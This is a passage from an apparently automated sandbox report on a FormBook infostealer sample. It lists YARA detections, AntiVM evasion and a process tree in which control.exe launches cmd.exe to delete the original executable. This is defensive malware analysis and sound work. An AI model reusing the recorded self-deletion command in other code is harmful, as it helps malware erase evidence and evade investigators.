                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Analysis Process: lTAPQJikGw.exe PID: 6192 Parent PID: 7056

                                                                      General

                                                                      Start time:18:06:51
                                                                      Start date:10/06/2021
                                                                      Path:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      Imagebase:0xa50000
                                                                      File size:865792 bytes
                                                                      MD5 hash:16657FA097CD334973A5489EEFF8BAFE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 6192

                                                                      General

                                                                      Start time:18:06:54
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: control.exe PID: 6848 Parent PID: 6192

                                                                      General

                                                                      Start time:18:07:24
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\SysWOW64\control.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                                      Imagebase:0xe00000
                                                                      File size:114688 bytes
                                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Analysis Process: cmd.exe PID: 6952 Parent PID: 6848

                                                                      General

                                                                      Start time:18:07:26
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: conhost.exe PID: 6936 Parent PID: 6952

                                                                      General

                                                                      Start time:18:07:26
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >